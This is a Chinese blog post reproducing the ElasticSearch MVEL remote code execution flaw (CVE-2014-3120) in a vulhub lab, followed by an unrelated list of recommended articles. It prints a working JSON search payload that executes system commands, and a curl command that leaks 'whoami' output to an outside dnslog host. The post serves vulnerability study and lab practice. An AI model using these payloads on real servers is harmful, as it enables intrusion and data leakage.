樱浅沐冰
樱浅沐冰

【vulhub】ElasticSearch 命令执行漏洞(CVE-2014-3120)漏洞验证与getshell

漏洞详情

老版本ElasticSearch支持传入动态脚本(MVEL)来执行一些复杂的操作,而MVEL可执行Java代码,而且没有沙盒,所以我们可以直接执行任意代码。elasticsearch版本:v1.1.1

详细过程请看

CVE-2014-3120 (命令执行漏洞)
这里楼主只复现2个payload

页面

/_search?pretty

post传参

payload1

{
    "size": 1,
    "query": {
      "filtered": {
        "query": {
          "match_all": {
          }
        }
      }
    },
    "script_fields": {
        "command": {
            "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"id\").getInputStream()).useDelimiter(\"\\\\A\").next();"
        }
    }
}
    }
}

【vulhub】ElasticSearch 命令执行漏洞(CVE-2014-3120)漏洞验证与getshell_第1张图片

payload2

dnslog获取一个dns地址
【vulhub】ElasticSearch 命令执行漏洞(CVE-2014-3120)漏洞验证与getshell_第2张图片
拼接命令

curl `whoami`.gp4pts.dnslog.cn

进行base64编码
【vulhub】ElasticSearch 命令执行漏洞(CVE-2014-3120)漏洞验证与getshell_第3张图片
替换相应的payload,然后重发包
【vulhub】ElasticSearch 命令执行漏洞(CVE-2014-3120)漏洞验证与getshell_第4张图片
成功回显
【vulhub】ElasticSearch 命令执行漏洞(CVE-2014-3120)漏洞验证与getshell_第5张图片
参考文章:
https://github.com/vulhub/vulhub/tree/master/elasticsearch/CVE-2014-3120

你可能感兴趣的:(ElasticSearch,vulhub)

  • ELK Stack 安装教程 - 构建日志存储告警系统 运维
    介绍“ELK”是三个开源项目的首字母缩写,这三个项目分别是:Elasticsearch、Logstash和Kibana。Elasticsearch是一个搜索和分析引擎。Logstash是服务器端数据处理管道,能够同时从多个来源采集数据,转换数据,然后将数据发送到诸如Elasticsearch等“存储库”中。Kibana则可以让用户在Elasticsearch中使用图形和图表对数据进行可视化。目前最
  • 快速入门:利用fast-elasticsearch-vector-scoring提升ES向量搜索效率 劳泉文Luna
    快速入门:利用fast-elasticsearch-vector-scoring提升ES向量搜索效率fast-elasticsearch-vector-scoringScoredocumentsusingembedding-vectorsdot-productorcosine-similaritywithESLuceneengine项目地址:https://gitcode.com/gh_mirro
  • ARM64环境部署EFK8.15.3收集K8S集群容器日志 llody_55 kubernetes容器云原生运维esjavaelasticsearch
    环境规划主机IP系统部署方式ES版本CPU架构用户名密码192.168.1.225Ubuntu22.04.4LTSdockerelasticsearch:8.15.3ARM64elasticllodyi4TMmZDES集群部署创建持久化目录(所有节点)mkdir-p/data/es/{data,certs,logs,plugins}mkdir-p/data/es/certs/{ca,es01}服务
  • 这给我干哪来了,MySQL都9.2了 赵师的工作日 mysql数据库
    作者:赵师的工作日(赵明中)现役OracleACE、MySQL8.0ocp、TiDBPCTA\PCTP、ElasticsearchCertifiedEngineer微信号:mzzhao23微信公众号:赵师的工作日墨天轮社区:赵师的工作日CSND:赵师的工作日MySQL9.2都来了确实有时间没上MySQL官网(www.mysql.com),MySQL都出9.2版本了。现在业内大头都是8.x版本,少部
  • MySQL-关于如何保存“大数据” 赵师的工作日 mysql大数据数据库
    作者:赵师的工作日(赵明中)现役OracleACE、MySQL8.0ocp、TiDBPCTA\PCTP、ElasticsearchCertifiedEngineer微信号:mzzhao23微信公众号:赵师的工作日墨天轮社区:赵师的工作日CSND:赵师的工作日数据库的种类有很多,各类数据库充分发挥各自的优势从而保证业务稳定运行,mysql轻量级、关键数据,redis缓存、快,ES搜索,Mongodb
  • 【实战ES】实战 Elasticsearch:快速上手与深度实践-6.2.2GDPR数据脱敏处理 言析数智 实战elasticsearch大数据搜索引擎
    点击关注不迷路点击关注不迷路点击关注不迷路文章大纲6.2.2GDPR数据脱敏处理深度实践指南1.GDPR核心要求映射1.1关键条款与技术要求1.2`数据类型与脱敏策略`2.全链路脱敏配置2.1`动态脱敏管道`2.2静态脱敏模板3.`脱敏算法性能对比`3.1算法性能矩阵3.2存储成本分析4.企业级合规方案4.1金融行业案例4.2医疗行业方案5.合规性验证方案5.1自动化检查脚本5.2审计检查清单6.
  • doris:Elasticsearch 向阳1218 大数据doris
    ElasticsearchCatalog除了支持自动映射ES元数据外,也可以利用Doris的分布式查询规划能力和ES(Elasticsearch)的全文检索能力相结合,提供更完善的OLAP分析场景解决方案:ES中的多index分布式Join查询。Doris和ES中的表联合查询,更复杂的全文检索过滤。使用限制支持Elasticsearch5.x及以上版本。创建CatalogCREATECATALOG
  • Elasticsearch在Linux环境下部署(单机版) Handsome Mr.Li elasticsearchelasticsearchlinux搜索引擎
    目录1.前言2.Centos下安装2.1下载完成后进行解压操作2.2修改内存参数2.3创建ES专属用户2.4修改ES核心配置信息3.配置Elasticsearch的用户名密码3.1编辑配置文件3.2重启es服务3.3设置用户名密码3.4验证是否生效4.安装ik中文分词器1.前言我的Elasticsearch版本为7.3.2Elasticsearch下载地址:下载地址2.Centos下安装2.1下载
  • 基于Linux环境部署和使用ElasticSearch搜索引擎 探模之翼 数据库搜索引擎linuxelasticsearch向量数据库多模态检索
    目录一.Elasticsearch基础介绍二.Docker部署单节点ElasticSearch1.环境配置2.创建数据目录3.创建ES自定义配置文件4.启动ElasticSearch服务5.验证服务三.DockerCompose部署单节点ElasticSearch1.环境配置2.创建docker-compose.yml3.创建配置文件elasticsearch.yml4.启动ElasticSear
  • 2025年渗透测试面试题总结-快某手-安全实习生(一面、二面)(题目+回答) 独行soc 2025年渗透测试面试指南安全科技网络面试护网2015年
    网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。目录快某手-安全实习生一面一、Linux操作:查看进程PID的5种方法二、Elasticsearch(ES)核心要点三、HTTPS建立过程(TLS1.3优化版)四、Python内存管理机制五、深拷贝与浅拷贝对比六、Python多线程局限性七、XSS防御方案八、SQL注入防
  • laravel使用elasticsearch 菜菜c PHPelasticsearchlaravel搜索引擎
    laravel使用elasticsearchlaravel中安装扩展包composer安装elasticsearch扩展包Elasticsearch官方提供了Composer包,在引入时需要注意要指定版本,因为不同版本的Elasticsearch的API略有不同,因为我用的是7.12.x,因此需使用~7.12.x来指定包版本。composerrequireelasticsearch/elastic
  • 如何使用Java和ElasticSearch实现全文搜索 微赚淘客系统开发者@聚娃科技 javaelasticsearch开发语言
    如何使用Java和ElasticSearch实现全文搜索大家好,我是微赚淘客系统3.0的小编,是个冬天不穿秋裤,天冷也要风度的程序猿!今天我们来探讨如何使用Java和ElasticSearch实现全文搜索。ElasticSearch是一个分布式搜索和分析引擎,能够处理大规模数据并提供实时搜索功能。在本文中,我们将介绍如何使用Java客户端与ElasticSearch进行交互,实现简单的全文搜索功能
  • docker 安装ELK 8.17.3 离开水的飞鱼 dockerelk容器
    ELK是指Elasticsearch、Logstash和Kibana这三个开源软件的组合。Elasticsearch是一个分布式的搜索和分析引擎,用于日志的存储,搜索,分析,查询。Logstash是一个数据收集、转换和传输工具,用于收集过滤和转换数据,然后将其发送到Elasticsearch或其他目标存储中。Kibana是一个数据可视化平台,通过与Elasticsearch的集成,提供了强大的数据
  • Laravel Elasticsearch 教程 贾泉希
    LaravelElasticsearch教程laravel-elasticsearchElasticsearchforLaravel项目地址:https://gitcode.com/gh_mirrors/lar/laravel-elasticsearch本指南将帮助您了解laravel-elasticsearch开源项目的基础,包括其目录结构、启动文件以及配置文件的简介,以便您可以顺利地在Lara
  • Easy-ES(用Mybatis-Plus语法来操作ElasticSearch) 充满希望的程序员 elasticsearchmybatis大数据搜索引擎
    简介Easy-Es(简称EE)是一款基于ElasticSearch(简称Es)官方提供的RestHighLevelClient打造的ORM开发框架,在RestHighLevelClient的基础上,只做增强不做改变,为简化开发、提高效率而生,如果有用过Mybatis-Plus(简称MP),那么基本可以零学习成本直接上手EE,EE是MP的Es平替版,在有些方面甚至比MP更简单,同时也融入了更多Es独
  • elasticsearch SQL:在Elasticsearch中启用和使用SQL功能 码到三十五 elasticsearch高手elasticsearch
    ❃博主首页:「码到三十五」,同名公众号:「码到三十五」,wx号:「liwu0213」☠博主专栏:♝博主的话:搬的每块砖,皆为峰峦之基;公众号搜索「码到三十五」关注这个爱发技术干货的coder,一起筑基目录一、基本概念二、主要功能和优势ElasticsearchSQL特点三、启用和使用SQL功能四、ElasticsearchSQL的使用4.1语法4.2sql查询4.3将SQL转换为DSL4.4全文检
  • 部署skywalking进行链路跟踪 BUG弄潮儿 skywalking
    1.前言本实验文档基于单机es7作为skywalking的后端存储,使用nfs动态卷storageclass,es没有使用账号密码。2.环境k8s集群:v1.20.4版本k8s-master1192.168.110.235k8s-node1192.168.110.236k8s-node2192.168.110.237nfs192.168.110.239elasticsearch:7.12.0sky
  • 【Elasticsearch】es 脚本编程使用详解 逆风飞翔的小叔 运维es脚本es脚本编程es脚本使用es脚本编程详解es脚本编程总结
    目录一、es脚本语言介绍1.1什么是es脚本1.2es脚本支持的语言1.3es脚本语言特点1.4es脚本使用场景二、环境准备2.1docker搭建es过程2.1.1拉取镜像2.1.2启动容器2.1.3配置参数2.1.4重启容器并访问2.2docker搭建kibana过程2.2.1拉取镜像2.2.2启动容器2.2.3修改配置文件2.2.4重启容器并访问三、Scripting使用详解3.1数据准备3.
  • 打造RAG系统:四大向量数据库Milvus、Faiss、Elasticsearch、Chroma 全面对比与选型指南 橙子小哥的代码世界 数据库数据库milvusfaiss人工智能深度学习神经网络elasticsearch
    在当今信息爆炸的时代,检索增强生成(Retrieval-AugmentedGeneration,简称RAG)系统已成为自然语言处理(NLP)领域的重要工具。RAG系统通过结合生成模型和信息检索技术,能够在大规模数据中高效地获取相关信息,生成更为精准和有针对性的内容。而在构建RAG系统时,选择合适的向量数据库是确保系统性能和可扩展性的关键一步。本文将深入对比四大主流向量数据库——Milvus、Fai
  • Linux 服務器上安裝和配置 ELK 堆棧(Elasticsearch、Logstash 和 Kibana) 蠟筆小新工程師 jenkins运维
    1.安裝Elasticsearch更新您的系統軟件包並安裝必要的工具:bashsudoapt-getupdatesudoapt-getinstallapt-transport-httpsca-certificateswgetcurlgnupg將Elasticsearch的GPG密鑰添加到系統:bashwget-qO-https://artifacts.elastic.co/GPG-KEY-elas
  • elasticsearch7.10.2 安装实战 spring208208 ES大数据运维elasticsearch
    Es7.10.2安装:1.下载es:https://www.elastic.co/cn/downloads/past-releases/elasticsearch-7-10-2useraddes_userpasswdes_user//123456chgrp-Res_user/home/apps/elasticsearch-7.10.2chown-Res_user/home/apps/elastic
  • ElasticSearch学习笔记 --- 调研笔记知识点 杨鑫newlfe 大数据挖掘与大数据应用案例搜索引擎
    笔记总结知识点:1.安装ElasticSearch。2.ELasticSearch是使用Java开发并使用Lucene作为核心来实现所有索引和搜索的功能3.使用是通过简单的restfulAPI来使用。4.安装Marvel(ES的管理和监控)5.特点:分布式的实时文件存储,每个字段都被索引并可被搜索分布式的实时分析搜引擎可以扩展到上百台服务器,处理PB级机构化或非结构化数据6.集群是一组具有相同cl
  • Elasticsearch--基础知识点--2--elasticsearch.yml Chasing__Dreams ElasticsearchES配置文件详解elasticsearch
    bin:脚本文件,包括ES启动&安装插件等等config:elasticsearch.yml(ES配置文件)、jvm.options(JVM配置文件)、日志配置文件等等JDK:内置的JDKlib:类库logs:日志文件modules:ES所有模块,包括X-pack等plugins:ES已经安装的插件。默认没有插件data:ES启动的时候,会有该目录,用来存储文档数据。该目录可以设置########
  • 如何收集 Kubernetes 集群的日志 沉默的八哥 运维kubernetes运维
    一、Kubernetes日志收集核心方案1.EFKStack(Elasticsearch+Fluentd+Kibana)•适用场景:企业级日志分析、复杂查询需求、长期日志存储。•组件作用:•Fluentd:日志收集器(部署为DaemonSet,每个Node运行一个实例)。•Elasticsearch:日志存储与索引(支持分布式、高并发)。•Kibana:可视化仪表盘(日志搜索、图表展示)。2.Lo
  • Elasticsearch 分布式架构解析 Mr' 郑 elasticsearch分布式架构
    Elasticsearch是一个分布式的搜索和分析引擎,以其高可扩展性和实时性著称。它基于Lucene开发,但提供了更高级别的抽象,使得开发者能够轻松地构建复杂的搜索应用。本文将深入探讨Elasticsearch的分布式存储和检索机制,解释其背后的原理及其优势。一、Elasticsearch的基本概念在开始之前,我们先了解几个Elasticsearch的基础概念:索引(Index):相当于关系型数
  • springboot+es批量新增、批量修改、根据内部id批量查询 程序小增 elasticsearchspringbootjava
    pom.xml配置org.elasticsearch.clientelasticsearch-rest-high-level-client7.8.0elasticsearchorg.elasticsearchelasticsearch-rest-clientorg.elasticsearch.clientorg.springframework.bootspring-boot-starter-dat
  • ELK(elasticsearch-7.17.4-windows-x86_64+logstash-7.17.4-windows-x86_64+kibana-7.17.4-windows-x86_64) LongtengGensSupreme elkelasticsearch大数据
    1、下载ELK(elasticsearch-7.17.4-windows-x86_64+logstash-7.17.4-windows-x86_64+kibana-7.17.4-windows-x86_64)2、解压elasticsearch-7.17.4-windows-x86_64,config目录下修改elasticsearch.yml文件,修改elasticsearch.yml内容如下:#
  • 【Elasticsearch】自定义内置的索引生命周期管理(ILM)策略。 risc123456 Elasticsearchelasticsearch
    以下是对Elasticsearch官方教程《Customizebuilt-inILMpolicies》的详细解读,结合原文内容,帮助您更好地理解如何自定义内置的索引生命周期管理(ILM)策略。---Elasticsearch教程:自定义内置ILM策略1.背景与目标Elasticsearch提供了内置的索引生命周期管理(ILM)策略,例如`logs@lifecycle`、`metrics@lifec
  • elasticsearch聚合查询 warrah 岁月云——大数据杂烩elasticsearch大数据
    9聚合后再过滤查询汇总后多条件过滤超过100万的数据POSTzzp_invoice/_search{"size":0,"query":{"range":{"SSYF":{"gte":"202101","lte":"202112"}}},"aggs":{"ssyf_group":{"terms":{"field":"XHDWMC.raw"},"aggs":{"sum_aggs":{"sum":{"f
  • 【Elasticsearch】索引 强制合并 缓存 refresh flush 等操作 九师兄 elasticsearches索引合并refresh
    文章目录1.概述1.1索引强制合并1.1.1实战1.2缓存清理1.3、flush操作1.4、refresh操作1.概述1.1索引强制合并强制合并的功能为强制合并一个或多个索引,目的是通过索引合并达到减少段的数量,通过POST方法执行_forcemergeAPI。强制合并请求在没有执行完成之前,请求会一直被阻塞,直到执行完成才会返回,如果期间该HTTP请求由于网络或者其它原因被断开,合并请求将继续在
  • 矩阵求逆(JAVA)初等行变换 qiuwanchi 矩阵求逆(JAVA)
    package gaodai.matrix; import gaodai.determinant.DeterminantCalculation; import java.util.ArrayList; import java.util.List; import java.util.Scanner; /** * 矩阵求逆(初等行变换) * @author 邱万迟 *
  • JDK timer antlove javajdkschedulecodetimer
    1.java.util.Timer.schedule(TimerTask task, long delay):多长时间(毫秒)后执行任务 2.java.util.Timer.schedule(TimerTask task, Date time):设定某个时间执行任务 3.java.util.Timer.schedule(TimerTask task, long delay,longperiod
  • JVM调优总结 -Xms -Xmx -Xmn -Xss coder_xpf jvm应用服务器
    堆大小设置JVM 中最大堆大小有三方面限制:相关操作系统的数据模型(32-bt还是64-bit)限制;系统的可用虚拟内存限制;系统的可用物理内存限制。32位系统下,一般限制在1.5G~2G;64为操作系统对内存无限制。我在Windows Server 2003 系统,3.5G物理内存,JDK5.0下测试,最大可设置为1478m。 典型设置: java -Xmx
  • JDBC连接数据库 Array_06 jdbc
    package Util; import java.sql.Connection; import java.sql.DriverManager; import java.sql.ResultSet; import java.sql.SQLException; import java.sql.Statement; public class JDBCUtil { //完
  • Unsupported major.minor version 51.0(jdk版本错误) oloz java
    java.lang.UnsupportedClassVersionError: cn/support/cache/CacheType : Unsupported major.minor version 51.0 (unable to load class cn.support.cache.CacheType) at org.apache.catalina.loader.WebappClassL
  • 用多个线程处理1个List集合 362217990 多线程threadlist集合
      昨天发了一个提问,启动5个线程将一个List中的内容,然后将5个线程的内容拼接起来,由于时间比较急迫,自己就写了一个Demo,希望对菜鸟有参考意义。。 import java.util.ArrayList; import java.util.List; import java.util.concurrent.CountDownLatch; public c
  • JSP简单访问数据库 香水浓 sqlmysqljsp
    学习使用javaBean,代码很烂,仅为留个脚印 public class DBHelper { private String driverName; private String url; private String user; private String password; private Connection connection; privat
  • Flex4中使用组件添加柱状图、饼状图等图表 AdyZhang Flex
    1.添加一个最简单的柱状图 ? 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 <?xml version= "1.0"&n
  • Android 5.0 - ProgressBar 进度条无法展示到按钮的前面 aijuans android
    在低于SDK < 21 的版本中,ProgressBar 可以展示到按钮前面,并且为之在按钮的中间,但是切换到android 5.0后进度条ProgressBar 展示顺序变化了,按钮再前面,ProgressBar 在后面了我的xml配置文件如下:   [html]  view plain copy   <RelativeLa
  • 查询汇总的sql baalwolf sql
    select   list.listname, list.createtime,listcount from dream_list as list ,   (select listid,count(listid) as listcount  from dream_list_user  group by listid  order by count(
  • Linux du命令和df命令区别 BigBird2012 linux
            1,两者区别             du,disk usage,是通过搜索文件来计算每个文件的大小然后累加,du能看到的文件只是一些当前存在的,没有被删除的。他计算的大小就是当前他认为存在的所有文件大小的累加和。        
  • AngularJS中的$apply,用还是不用? bijian1013 JavaScriptAngularJS$apply
            在AngularJS开发中,何时应该调用$scope.$apply(),何时不应该调用。下面我们透彻地解释这个问题。         但是首先,让我们把$apply转换成一种简化的形式。         scope.$apply就像一个懒惰的工人。它需要按照命
  • [Zookeeper学习笔记十]Zookeeper源代码分析之ClientCnxn数据序列化和反序列化 bit1129 zookeeper
    ClientCnxn是Zookeeper客户端和Zookeeper服务器端进行通信和事件通知处理的主要类,它内部包含两个类,1. SendThread 2. EventThread, SendThread负责客户端和服务器端的数据通信,也包括事件信息的传输,EventThread主要在客户端回调注册的Watchers进行通知处理   ClientCnxn构造方法   &
  • 【Java命令一】jmap bit1129 Java命令
    jmap命令的用法:   [hadoop@hadoop sbin]$ jmap Usage: jmap [option] <pid> (to connect to running process) jmap [option] <executable <core> (to connect to a
  • Apache 服务器安全防护及实战 ronin47
    此文转自IBM. Apache 服务简介 Web 服务器也称为 WWW 服务器或 HTTP 服务器 (HTTP Server),它是 Internet 上最常见也是使用最频繁的服务器之一,Web 服务器能够为用户提供网页浏览、论坛访问等等服务。 由于用户在通过 Web 浏览器访问信息资源的过程中,无须再关心一些技术性的细节,而且界面非常友好,因而 Web 在 Internet 上一推出就得到
  • unity 3d实例化位置出现布置? brotherlamp unity教程unityunity资料unity视频unity自学
    问:unity 3d实例化位置出现布置? 答:实例化的同时就可以指定被实例化的物体的位置,即 position  Instantiate (original : Object, position : Vector3, rotation : Quaternion) : Object 这样你不需要再用Transform.Position了,   如果你省略了第二个参数(
  • 《重构,改善现有代码的设计》第八章 Duplicate Observed Data bylijinnan java重构
    import java.awt.Color; import java.awt.Container; import java.awt.FlowLayout; import java.awt.Label; import java.awt.TextField; import java.awt.event.FocusAdapter; import java.awt.event.FocusE
  • struts2更改struts.xml配置目录 chiangfai struts.xml
    struts2默认是读取classes目录下的配置文件,要更改配置文件目录,比如放在WEB-INF下,路径应该写成../struts.xml(非/WEB-INF/struts.xml) web.xml文件修改如下:   <filter> <filter-name>struts2</filter-name> <filter-class&g
  • redis做缓存时的一点优化 chenchao051 redishadooppipeline
            最近集群上有个job,其中需要短时间内频繁访问缓存,大概7亿多次。我这边的缓存是使用redis来做的,问题就来了。       首先,redis中存的是普通kv,没有考虑使用hash等解结构,那么以为着这个job需要访问7亿多次redis,导致效率低,且出现很多redi
  • mysql导出数据不输出标题行 daizj mysql数据导出去掉第一行去掉标题
    当想使用数据库中的某些数据,想将其导入到文件中,而想去掉第一行的标题是可以加上-N参数 如通过下面命令导出数据: mysql -uuserName -ppasswd -hhost -Pport -Ddatabase -e " select * from tableName"  > exportResult.txt 结果为: studentid
  • phpexcel导出excel表简单入门示例 dcj3sjt126com PHPExcelphpexcel
    先下载PHPEXCEL类文件,放在class目录下面,然后新建一个index.php文件,内容如下 <?php error_reporting(E_ALL); ini_set('display_errors', TRUE); ini_set('display_startup_errors', TRUE);   if (PHP_SAPI == 'cli') die('
  • 爱情格言 dcj3sjt126com 格言
     1) I love you not because of who you are, but because of who I am when I am with you.    我爱你,不是因为你是一个怎样的人,而是因为我喜欢与你在一起时的感觉。   2) No man or woman is worth your tears, and the one who is, won‘t
  • 转 Activity 详解——Activity文档翻译 e200702084 androidUIsqlite配置管理网络应用
    activity 展现在用户面前的经常是全屏窗口,你也可以将 activity 作为浮动窗口来使用(使用设置了 windowIsFloating 的主题),或者嵌入到其他的 activity (使用 ActivityGroup )中。 当用户离开 activity 时你可以在 onPause() 进行相应的操作 。更重要的是,用户做的任何改变都应该在该点上提交 ( 经常提交到 ContentPro
  • win7安装MongoDB服务 geeksun mongodb
    1.  下载MongoDB的windows版本:mongodb-win32-x86_64-2008plus-ssl-3.0.4.zip,Linux版本也在这里下载,下载地址: http://www.mongodb.org/downloads   2.  解压MongoDB在D:\server\mongodb, 在D:\server\mongodb下创建d
  • Javascript魔法方法:__defineGetter__,__defineSetter__ hongtoushizi js
    转载自: http://www.blackglory.me/javascript-magic-method-definegetter-definesetter/ 在javascript的类中,可以用defineGetter和defineSetter_控制成员变量的Get和Set行为 例如,在一个图书类中,我们自动为Book加上书名符号: function Book(name){
  • 错误的日期格式可能导致走nginx proxy cache时不能进行304响应 jinnianshilongnian cache
    昨天在整合某些系统的nginx配置时,出现了当使用nginx cache时无法返回304响应的情况,出问题的响应头: Content-Type:text/html; charset=gb2312 Date:Mon, 05 Jan 2015 01:58:05 GMT Expires:Mon , 05 Jan 15 02:03:00 GMT Last-Modified:Mon, 05
  • 数据源架构模式之行数据入口 home198979 PHP架构行数据入口
    注:看不懂的请勿踩,此文章非针对java,java爱好者可直接略过。   一、概念 行数据入口(Row Data Gateway):充当数据源中单条记录入口的对象,每行一个实例。   二、简单实现行数据入口 为了方便理解,还是先简单实现: <?php /** * 行数据入口类 */ class OrderGateway { /*定义元数
  • Linux各个目录的作用及内容 pda158 linux脚本
    1)根目录“/”   根目录位于目录结构的最顶层,用斜线(/)表示,类似于 Windows 操作系统的“C:\“,包含Fedora操作系统中所有的目录和文件。   2)/bin   /bin   目录又称为二进制目录,包含了那些供系统管理员和普通用户使用的重要 linux命令的二进制映像。该目录存放的内容包括各种可执行文件,还有某些可执行文件的符号连接。常用的命令有:cp、d
  • ubuntu12.04上编译openjdk7 ol_beta HotSpotjvmjdkOpenJDK
    获取源码 从openjdk代码仓库获取(比较慢) 安装mercurial Mercurial是一个版本管理工具。 sudo apt-get install mercurial 将以下内容添加到$HOME/.hgrc文件中,如果没有则自己创建一个: [extensions] forest=/home/lichengwu/hgforest-crew/forest.py fe
  • 将数据库字段转换成设计文档所需的字段 vipbooks 设计模式工作正则表达式
            哈哈,出差这么久终于回来了,回家的感觉真好!         PowerDesigner的物理数据库一出来,设计文档中要改的字段就多得不计其数,如果要把PowerDesigner中的字段一个个Copy到设计文档中,那将会是一件非常痛苦的事情。
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他